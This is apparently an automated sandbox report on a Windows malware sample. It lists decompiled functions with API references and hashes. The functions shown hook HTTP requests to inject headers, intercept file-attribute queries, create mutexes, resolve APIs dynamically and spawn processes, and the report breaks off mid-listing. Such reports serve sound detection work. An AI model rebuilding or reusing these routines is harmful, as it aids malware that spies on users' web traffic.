Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorFreeLast
String ID:
API String ID: 647283058-0
Opcode ID: 7506e1626c13625625b78eff052a29cf44157c8570421bd7b7b6121db458cfd6
Instruction ID: 7982cb950c10b9e9f3f7904e51c632f1a7264e0a47349f5811c68f4df8127647
Opcode Fuzzy Hash: 7506e1626c13625625b78eff052a29cf44157c8570421bd7b7b6121db458cfd6
Instruction Fuzzy Hash: FC018671301712FBE6249755ECC4FE777ACEB84750F500429FA05E62A0D674EC4087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A270, Relevance: 7.6, APIs: 5, Instructions: 50
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A270(void* __ecx, struct HWINSTA__* _a4) {
				void* __edi;
				struct HWINSTA__* _t3;
				int _t5;
				void* _t12;
				void* _t18;
				void* _t19;

				_t3 = GetProcessWindowStation();
				_t12 = 0;
				_t19 = E0041A1E0(_t3);
				if(_t19 == 0) {
					L6:
					_t5 = SetProcessWindowStation(_a4);
					if(_t5 != 0) {
						goto L8;
					} else {
						return _t5;
					}
				} else {
					_t18 = E0041A1E0(_a4);
					if(_t18 != 0) {
						if(lstrcmpiW(_t19, _t18) == 0) {
							_t12 = 1;
						}
						HeapFree( *0x42e6d4, 0, _t18);
					}
					HeapFree( *0x42e6d4, 0, _t19);
					if(_t12 != 0) {
						L8:
						return 1;
					} else {
						goto L6;
					}
				}
			}

0x0041a273
0x0041a27b
0x0041a282
0x0041a286
0x0041a2c8
0x0041a2cd
0x0041a2d5
0x00000000
0x0041a2da
0x0041a2da
0x0041a2da
0x0041a288
0x0041a298
0x0041a29c
0x0041a2a8
0x0041a2aa
0x0041a2aa
0x0041a2b5
0x0041a2b5
0x0041a2c1
0x0041a2c6
0x0041a2df
0x0041a2e5
0x00000000
0x00000000
0x00000000
0x0041a2c6

APIs

GetProcessWindowStation.USER32(?,?,00000000,0041A3C5,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A273

Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,?,00000000,?,00000000), ref: 0041A207
Part of subcall function 0041A1E0: HeapAlloc.KERNEL32(?,00000008,?), ref: 0041A229
Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,?,?), ref: 0041A243

lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2A0
HeapFree.KERNEL32(?,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2B5
HeapFree.KERNEL32(?,00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2C1
SetProcessWindowStation.USER32(?,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2CD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeInformationObjectProcessStationUserWindow$Alloclstrcmpi
String ID:
API String ID: 2651280557-0
Opcode ID: b136f6f976b5ed88ab4652f4956fd04f0dd4f3c54d0efcd18a916bfa6c72ce96
Instruction ID: 2040e6aa85ed6874ed9d6dcc3b28255d690d9755b69c721ae35a2c70695d39a4
Opcode Fuzzy Hash: b136f6f976b5ed88ab4652f4956fd04f0dd4f3c54d0efcd18a916bfa6c72ce96
Instruction Fuzzy Hash: 40F0D13234320127C220A766AC44FAB776C9BE17A0F14443AFA0097310DA3AE85587AE

Uniqueness

Uniqueness Score: -1.00%

Function 00417FC0, Relevance: 7.5, APIs: 5, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417FC0(WCHAR* __edi, void* _a4, long _a8) {
				void* _t6;
				long _t11;
				WCHAR* _t13;
				void* _t14;
				long _t15;

				_t13 = __edi;
				_t15 = _a8;
				_t11 = 0;
				_t14 = CreateFileW(__edi, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t14 != 0xffffffff) {
					_t6 = _a4;
					if(_t6 == 0 || _t15 == 0 || WriteFile(_t14, _t6, _t15,  &_a8, 0) != 0) {
						_t11 = 1;
					}
					CloseHandle(_t14);
					if(_t11 != 1) {
						SetFileAttributesW(_t13, 0x80);
						DeleteFileW(_t13);
					}
				}
				return _t11;
			}

0x00417fc0
0x00417fc2
0x00417fda
0x00417fe2
0x00417fe7
0x00417fe9
0x00417fef
0x00418009
0x00418009
0x0041800c
0x00418015
0x0041801d
0x00418024
0x00418024
0x00418015
0x0041802f

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,00000000,00412EE6,?,00000000), ref: 00417FDC
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00412EE6,?,00000000), ref: 00417FFF
CloseHandle.KERNEL32(00000000,?,00000000,00412EE6,?,00000000), ref: 0041800C
SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00412EE6,?,00000000), ref: 0041801D
DeleteFileW.KERNEL32(?,?,00000000,00412EE6,?,00000000), ref: 00418024

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCloseCreateDeleteHandleWrite
String ID:
API String ID: 4109557446-0
Opcode ID: 72cfcebbc607913f7bd96cd4498baa6de7259e6606f4dc81ee13c040ed708bcc
Instruction ID: 0c4f44c00b3cc10d36ff1604a0158dbd11031c375665e6d842dece277b052db2
Opcode Fuzzy Hash: 72cfcebbc607913f7bd96cd4498baa6de7259e6606f4dc81ee13c040ed708bcc
Instruction Fuzzy Hash: F7F0C8312813047BE3205B209D49FE73B5CAB09B50F09011DF651B61E0DFA55889C76C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C010, Relevance: 7.5, APIs: 5, Instructions: 42
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C010(void* _a4) {
				void* _t6;
				intOrPtr* _t9;
				intOrPtr _t10;
				int _t11;
				void* _t12;

				_t12 = _a4;
				_t11 = InternetCloseHandle(_t12);
				if(WaitForSingleObject( *0x42edbc, 0) == 0) {
					L10:
					return _t11;
				} else {
					EnterCriticalSection(0x42d3ec);
					if(_t12 == 0) {
						L9:
						LeaveCriticalSection(0x42d3ec);
						goto L10;
					} else {
						_t10 =  *0x42d408; // 0x0
						_t6 = 0;
						if(_t10 != 0) {
							_t9 =  *0x42d404; // 0x0
							while( *_t9 != _t12) {
								_t6 = _t6 + 1;
								_t9 = _t9 + 0x24;
								if(_t6 < _t10) {
									continue;
								} else {
									LeaveCriticalSection(0x42d3ec);
									return _t11;
								}
								goto L11;
							}
							if(_t6 != 0xffffffff) {
								E0040AB30(_t6);
							}
						}
						goto L9;
					}
				}
				L11:
			}

0x0040c011
0x0040c01d
0x0040c02f
0x0040c085
0x0040c089
0x0040c031
0x0040c036
0x0040c03e
0x0040c07a
0x0040c07f
0x00000000
0x0040c040
0x0040c040
0x0040c046
0x0040c04a
0x0040c04c
0x0040c052
0x0040c056
0x0040c057
0x0040c05c
0x00000000
0x0040c05e
0x0040c063
0x0040c06d
0x0040c06d
0x00000000
0x0040c05c
0x0040c073
0x0040c075
0x0040c075
0x0040c073
0x00000000
0x0040c04a
0x0040c03e
0x00000000

APIs

InternetCloseHandle.WININET(?), ref: 0040C017
WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C027
EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040C036
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C063
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C07F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CloseEnterHandleInternetObjectSingleWait
String ID:
API String ID: 728985351-0
Opcode ID: eab4a19b1178702a7dc22b6a242e56df1f21b5d3f2bc41615843312c4e51d226
Instruction ID: e15a466101f71e5fff6dc4075761070a20626ead8d028e6ca64cb5bc7266f447
Opcode Fuzzy Hash: eab4a19b1178702a7dc22b6a242e56df1f21b5d3f2bc41615843312c4e51d226
Instruction Fuzzy Hash: 22F08135B40210C7C62467A9ED88F4B3765ABC6711358433BF502F22F0C6389847C66D

Uniqueness

Uniqueness Score: -1.00%

Function 004272D0, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,0042786A,00000000,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 004272D7
ReleaseMutex.KERNEL32(?,?,?,?,00000000,00427C53,?,00000001,000000A0,?,?), ref: 0042730C
IsWindow.USER32(?), ref: 00427313
PostMessageW.USER32(?,00000215,00000000,00000000), ref: 0042732D
SendMessageW.USER32(?,00000215,00000000,00000000), ref: 00427339

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 012948ecbff93eba352602cb0e3349690419297354f52afa58567f760f042e87
Instruction ID: 29400ff5c99324c20b3d18f4a07447326f7a1397cf838a9622f9731488d6794f
Opcode Fuzzy Hash: 012948ecbff93eba352602cb0e3349690419297354f52afa58567f760f042e87
Instruction Fuzzy Hash: E2014B74208301DBC3208F28E948E6BB7B4FB98710F184B6DF895D3360C774A444CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D340(short* __edi, WCHAR* _a8) {
				intOrPtr _v28;
				char _v668;
				char _v796;
				char _v1056;
				char _v1076;
				char _v1080;
				char _v1086;
				char _v1096;
				char _v1106;
				char _v1556;
				void* __esi;
				intOrPtr _t28;
				int _t29;
				signed int _t30;
				signed int _t31;
				int _t33;
				signed int _t34;
				void* _t35;
				void* _t36;
				WCHAR* _t42;
				short* _t47;
				char* _t49;
				WCHAR* _t50;
				void* _t51;

				_t47 = __edi;
				_t50 = _a8;
				E0041D150( &_v796);
				E00410820( &_v1056,  &_v668, 0x102);
				_t44 =  &_v1556;
				E00410820( &_v1556, 0x42eb80, 0x1e6);
				E00412640( &_v1080, _t44, 0x1e6);
				_t28 = _v28;
				if(_t28 == 0) {
					_t49 =  &_v1096;
					L6:
					_t29 = 0;
					if(_v1106 == 0) {
						L9:
						_t30 = MultiByteToWideChar(0, 0,  &_v1106, _t29, _t47, 0xa);
						if(_t30 >= 0xa) {
							_t30 = 0;
						}
						_t47[_t30] = 0;
						if(_t30 == 0) {
							L25:
							_t31 = 0;
							 *_t50 = 0;
							 *_t47 = 0;
							goto L26;
						} else {
							_t42 = _t47;
							if(_t47 == 0) {
								L17:
								if(PathCombineW(_t50, L"SOFTWARE\\Microsoft", _t42) == 0) {
									goto L25;
								}
								_t33 = 0;
								if(_t49 == 0 ||  *_t49 == 0) {
									L22:
									_t31 = MultiByteToWideChar(0, 0, _t49, _t33, _t47, 0xa);
									if(_t31 >= 0xa) {
										_t31 = 0;
									}
									_t47[_t31] = 0;
									if(_t31 != 0) {
										L26:
										return _t31;
									} else {
										goto L25;
									}
								} else {
									do {
										_t33 = _t33 + 1;
									} while (_t49[_t33] != 0);
									goto L22;
								}
							}
							while(1) {
								_t34 =  *_t42 & 0x0000ffff;
								if(_t34 != 0x5c && _t34 != 0x2f) {
									goto L17;
								}
								_t42 =  &(_t42[1]);
							}
							goto L17;
						}
					}
					do {
						_t29 = _t29 + 1;
					} while ( *((char*)(_t51 + _t29 + 0x1be)) != 0);
					goto L9;
				}
				_t35 = _t28 - 1;
				if(_t35 == 0) {
					_t49 =  &_v1086;
					goto L6;
				}
				_t36 = _t35 - 1;
				if(_t36 == 0) {
					_t49 =  &_v1076;
					goto L6;
				}
				return _t36;
			}

0x0041d340
0x0041d347
0x0041d356
0x0041d370
0x0041d37f
0x0041d384
0x0041d398
0x0041d3a4
0x0041d3a7
0x0041d3c5
0x0041d3cc
0x0041d3cc
0x0041d3d5
0x0041d3eb
0x0041d402
0x0041d407
0x0041d409
0x0041d409
0x0041d40d
0x0041d413
0x0041d473
0x0041d475
0x0041d477
0x0041d47b
0x00000000
0x0041d415
0x0041d415
0x0041d419
0x0041d432
0x0041d441
0x00000000
0x00000000
0x0041d443
0x0041d447
0x0041d457
0x0041d460
0x0041d465
0x0041d467
0x0041d467
0x0041d46b
0x0041d471
0x0041d47e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d450
0x0041d450
0x0041d450
0x0041d451
0x00000000
0x0041d450
0x0041d447
0x0041d420
0x0041d420
0x0041d426
0x00000000
0x00000000
0x0041d42d
0x0041d42d
0x00000000
0x0041d420
0x0041d413
0x0041d3e0
0x0041d3e0
0x0041d3e1
0x00000000
0x0041d3e0
0x0041d3a9
0x0041d3aa
0x0041d3bc
0x00000000
0x0041d3bc
0x0041d3ac
0x0041d3ad
0x0041d3b3
0x00000000
0x0041d3b3
0x0041d487

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0041D402
PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,0042E704,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D439
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D460

Strings

SOFTWARE\Microsoft, xrefs: 0041D433

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$CombinePath
String ID: SOFTWARE\Microsoft
API String ID: 1428641638-1421276983
Opcode ID: 13d6b896f3585b1f6387c13d7fae3e189d03c9c24a870b64ae15f5e3acc9caee
Instruction ID: 0b129dd3e7090026901ed36b09d424622f4f1925d1b1619b701fca247166d06f
Opcode Fuzzy Hash: 13d6b896f3585b1f6387c13d7fae3e189d03c9c24a870b64ae15f5e3acc9caee
Instruction Fuzzy Hash: 0C3104F1A483516AD334DB249C45BFB73A9AF94704F04082FE995D7291EB78B9C0C29E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A110(WCHAR* _a4, union _GET_FILEEX_INFO_LEVELS _a8, void* _a12) {
				void* __edi;
				void* __ebp;
				signed int _t16;
				void* _t17;
				WCHAR* _t23;
				void* _t26;
				signed short* _t27;
				void _t29;
				void* _t32;
				union _GET_FILEEX_INFO_LEVELS _t33;

				_t23 = _a4;
				_t33 = _a8;
				if(_t33 != 0x78f16360 || _t23 == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					L14:
					return GetFileAttributesExW(_t23, _t33, _a12);
				} else {
					_t16 = 0;
					_t27 = 0x42ed66;
					if( *_t23 == 0) {
						L10:
						_t17 = _t16 + 0xffffffda;
						__eflags = _t17;
						if(__eflags == 0) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						do {
							_t16 = _t16 + 1;
						} while (_t23[_t16] != 0);
						if(_t16 != 0x26) {
							goto L10;
						} else {
							_t26 = 0;
							_t32 = _t23 - 0x42ed66;
							while(1) {
								_t17 = ( *(_t32 + _t27) & 0x0000ffff) - ( *_t27 & 0x0000ffff);
								if(_t17 != 0) {
									break;
								}
								_t26 = _t26 + 1;
								_t27 =  &(_t27[1]);
								if(_t26 < 0x26) {
									continue;
								} else {
									L12:
									_t29 = VirtualAlloc(0, 0x1000, 0x3000, 4);
									_t43 = _t29;
									if(_t29 == 0) {
										goto L14;
									} else {
										E0040FC20(_t29, _t33, _t43);
										 *_a12 = _t29;
										return 1;
									}
								}
								goto L15;
							}
							L11:
							__eflags = _t17;
							_t25 = 0 | _t17 > 0x00000000;
							_t9 = _t25 - 1; // -1
							__eflags = (_t17 > 0) + _t9;
							if(__eflags != 0) {
								goto L14;
							} else {
								goto L12;
							}
						}
					}
				}
				L15:
			}

0x0041a111
0x0041a116
0x0041a122
0x0041a1cb
0x0041a1dc
0x0041a146
0x0041a146
0x0041a148
0x0041a150
0x0041a186
0x0041a186
0x0041a186
0x0041a189
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a152
0x0041a152
0x0041a152
0x0041a153
0x0041a15d
0x00000000
0x0041a15f
0x0041a161
0x0041a163
0x0041a170
0x0041a177
0x0041a179
0x00000000
0x00000000
0x0041a17b
0x0041a17c
0x0041a182
0x00000000
0x0041a184
0x0041a19a
0x0041a1ae
0x0041a1b0
0x0041a1b2
0x00000000
0x0041a1b4
0x0041a1b4
0x0041a1bd
0x0041a1c8
0x0041a1c8
0x0041a1b2
0x00000000
0x0041a182
0x0041a18b
0x0041a18d
0x0041a18f
0x0041a192
0x0041a196
0x0041a198
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a198
0x0041a15d
0x0041a150
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041A138
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 0041A1A8
GetFileAttributesExW.KERNEL32(?,?,?), ref: 0041A1D2

Strings

fB, xrefs: 0041A148

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocAttributesFileObjectSingleVirtualWait
String ID: fB
API String ID: 2067563439-1509387770
Opcode ID: 2fa431b499c3d05ff3381177bcd954569a518c8053f40f71d8a9e83f3504c634
Instruction ID: c94650b04033a7bb5ba6436a91ac8bb26e3983938c23e55559d70869732cf74e
Opcode Fuzzy Hash: 2fa431b499c3d05ff3381177bcd954569a518c8053f40f71d8a9e83f3504c634
Instruction Fuzzy Hash: 17110332306312A7D7308F69DC80BBBB3A8FB85351F14853BF601C6284E73998A5825A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D6F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041D6F0(void* __eflags) {
				char _v48;
				char _v72;
				char _v84;
				void* _v88;
				void* __edi;
				void* __esi;
				void* _t16;
				CHAR* _t27;
				void* _t28;
				WCHAR* _t31;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t31 =  &_v72;
				E00424100(0xe3, _t31);
				_t32 = GetModuleHandleW(_t31);
				if(_t32 != 0) {
					_t27 =  &_v84;
					E004240C0(0xe4, _t27);
					_t28 = GetProcAddress(_t32, _t27);
					__eflags = _t28;
					if(_t28 == 0) {
						L4:
						__eflags = 0;
						return 0;
					} else {
						_t33 =  &_v48;
						_v88 = 0;
						E00424100(0xd5,  &_v48);
						_push(0x1e6);
						_push("0xE07FD4A0");
						_t16 = E00411DC0(__eflags,  &_v88, _t33, 0x2020000);
						__eflags = _t16;
						if(_t16 > 0) {
							_t34 = _v88;
							 *_t28(0, _t34, "#", 0x10040);
							__eflags = _t34;
							if(_t34 != 0) {
								HeapFree( *0x42e6d4, 0, _t34);
							}
							return 1;
						} else {
							goto L4;
						}
					}
				} else {
					return 0;
				}
			}

0x0041d6f4
0x0041d6fd
0x0041d70b
0x0041d70f
0x0041d719
0x0041d722
0x0041d731
0x0041d733
0x0041d735
0x0041d770
0x0041d771
0x0041d777
0x0041d737
0x0041d737
0x0041d740
0x0041d748
0x0041d74d
0x0041d752
0x0041d764
0x0041d76c
0x0041d76e
0x0041d778
0x0041d789
0x0041d78b
0x0041d78d
0x0041d799
0x0041d799
0x0041d7a6
0x00000000
0x00000000
0x00000000
0x0041d76e
0x0041d711
0x0041d717
0x0041d717

APIs

GetModuleHandleW.KERNEL32(?), ref: 0041D705
GetProcAddress.KERNEL32(00000000,?), ref: 0041D72B

Strings

0xE07FD4A0, xrefs: 0041D752

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0xE07FD4A0
API String ID: 1646373207-1065333866
Opcode ID: 0a47555fded8d4814bd641e02d37237e095be87868ef2ff6a20402c512c19ecd
Instruction ID: 7e2907d0c201f07cc163f0919484b5d31eda1b491e013aefd9da79797569f5d9
Opcode Fuzzy Hash: 0a47555fded8d4814bd641e02d37237e095be87868ef2ff6a20402c512c19ecd
Instruction Fuzzy Hash: A11125BAA0037037D6217B19EC0ABCB7B99DFD0B50F80441AFD04B7381DA38D94586EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040BEB0(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
				char _v20;
				char _v24;
				WCHAR* _v36;
				long _v44;
				long _v48;
				long _v52;
				intOrPtr _v56;
				long _t17;
				struct _GOPHER_FIND_DATAA _t18;
				int _t19;
				WCHAR* _t22;
				long _t26;
				void* _t33;

				_t17 = WaitForSingleObject( *0x42edbc, 0);
				_t33 = _a4;
				_t18 = _a8;
				if(_t17 == 0) {
					L8:
					_t19 = HttpSendRequestExW(_t33, _t18, _a12, _a16, _a20);
					L9:
					return _t19;
				}
				_push(0x28);
				if(_t18 != 0) {
					_push(_t18);
					_push( &_v44);
					E00410820();
					_t26 = _v44;
					if(_t26 != 0) {
						_t22 = _v36;
						if(_t22 != 0) {
							HttpAddRequestHeadersW(_t33, _t22, _t26, 0xa0000000);
							_v52 = 0;
							_v48 = 0;
						}
					}
				} else {
					_push(_t18);
					_push( &_v44);
					E00410870(_t18);
					_v56 = 0x28;
				}
				_t19 = E0040BB80(_t33,  &_v24,  &_v20);
				if(_t19 != 0xffffffff) {
					goto L9;
				} else {
					_t18 =  &_v44;
					goto L8;
				}
			}

0x0040bec2
0x0040bec8
0x0040becd
0x0040bed0
0x0040bf3f
0x0040bf4d
0x0040bf53
0x0040bf57
0x0040bf57
0x0040bed2
0x0040bed6
0x0040beed
0x0040bef2
0x0040bef3
0x0040bef8
0x0040befe
0x0040bf00
0x0040bf06
0x0040bf10
0x0040bf16
0x0040bf1e
0x0040bf1e
0x0040bf06
0x0040bed8
0x0040bed8
0x0040bedd
0x0040bede
0x0040bee3
0x0040bee3
0x0040bf31
0x0040bf39
0x00000000
0x0040bf3b
0x0040bf3b
0x00000000
0x0040bf3b

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BEC2
HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 0040BF10
HttpSendRequestExW.WININET(?,?,?,?,?), ref: 0040BF4D

Strings

(, xrefs: 0040BEE3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpRequest$HeadersObjectSendSingleWait
String ID: (
API String ID: 2328130936-3887548279
Opcode ID: d6479ef9380a0b144eb09de015bbf429e148b72c91c985423fa770a630f156a5
Instruction ID: 486407b1eeee0ec063aa1d65b5b519647f3d8b40f9334c9bcd03a7936921a867
Opcode Fuzzy Hash: d6479ef9380a0b144eb09de015bbf429e148b72c91c985423fa770a630f156a5
Instruction Fuzzy Hash: 4E115E71204306ABD310DF25DC85FBB77ACEB84754F004A2EB955E3290DB74E9458BEA

Uniqueness

Uniqueness Score: -1.00%

Function 00412B40, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412B40(struct _STARTUPINFOW* __eax, void* __ecx, WCHAR* __edx, WCHAR* _a4) {
				char _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v92;
				WCHAR* _t14;
				struct _STARTUPINFOW* _t27;
				WCHAR* _t30;
				void* _t33;

				_t30 = __edx;
				_t33 = __ecx;
				_v92 = 0;
				if(__eax != 0) {
					_t27 = __eax;
				} else {
					E00410870( &_v72,  &_v72, __eax, 0x44);
					_v88.hThread = 0x44;
					_t27 =  &(_v88.hThread);
				}
				_t14 =  &_v92;
				if(_t30 != 0) {
					_t14 = _t30;
				}
				if(CreateProcessW(0, _t14, 0, 0, 0, 0x4000000, 0, _a4, _t27,  &_v88) == 0) {
					return 0;
				} else {
					if(_t33 == 0) {
						CloseHandle(_v88.hThread);
						CloseHandle(_v88);
						return _v88.dwProcessId;
					} else {
						E00410820(_t33,  &_v88, 0x10);
						return _v92;
					}
				}
			}

0x00412b40
0x00412b44
0x00412b48
0x00412b4f
0x00412b6c
0x00412b51
0x00412b59
0x00412b5e
0x00412b66
0x00412b66
0x00412b6e
0x00412b74
0x00412b76
0x00412b76
0x00412b9b
0x00412bde
0x00412b9d
0x00412b9f
0x00412bc4
0x00412bcb
0x00412bd5
0x00412ba1
0x00412ba9
0x00412bb6
0x00412bb6
0x00412b9f

APIs

CreateProcessW.KERNEL32 ref: 00412B93
CloseHandle.KERNEL32(?), ref: 00412BC4
CloseHandle.KERNEL32(?), ref: 00412BCB

Strings

D, xrefs: 00412B5E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: bd701f2a9f65dc9310330b62ddc1fe7f8572f881f9edfac2d4ff7529288562ac
Instruction ID: 9a1b4ec5adeeaa8d6eb28548dba5ae46276bb9d24ecf5e8bb5758280c9ddd1e0
Opcode Fuzzy Hash: bd701f2a9f65dc9310330b62ddc1fe7f8572f881f9edfac2d4ff7529288562ac
Instruction Fuzzy Hash: 561186766083016BD314EF58CD41FEB73D9AF84B00F04881EB645E7280EAB4E95487DA

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041CCB0(void* __eflags) {
				intOrPtr _v28;
				char _v704;
				char _v800;
				void* _v1154;
				char _v1472;
				char _v1600;
				char _v1612;
				char _v1864;
				char _v1888;
				char _v2000;
				short _v2012;
				void* __esi;
				void* _t24;
				void* _t36;

				E0041D150( &_v800);
				E0041D150( &_v1600);
				E00410820( &_v1864,  &_v1472, 0x102);
				_t32 =  &_v1612;
				E00410820( &_v1612, 0x42eb80, 0x1e6);
				E00412640( &_v1888, _t32, 0x1e6);
				E00416E10(0x42eb70,  &_v704, _v28,  &_v2000, 2);
				_t24 = CreateMutexW(0x42e930, 1,  &_v2012);
				_t36 = _t24;
				if(_t36 == 0) {
					return _t24;
				} else {
					if(GetLastError() != 0xb7) {
						return _t36;
					}
					CloseHandle(_t36);
					return 0;
				}
			}

0x0041ccbe
0x0041ccca
0x0041cce1
0x0041ccf0
0x0041ccf8
0x0041cd09
0x0041cd30
0x0041cd41
0x0041cd47
0x0041cd4b
0x0041cd76
0x0041cd4d
0x0041cd58
0x00000000
0x0041cd6d
0x0041cd5b
0x0041cd6a
0x0041cd6a

APIs

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

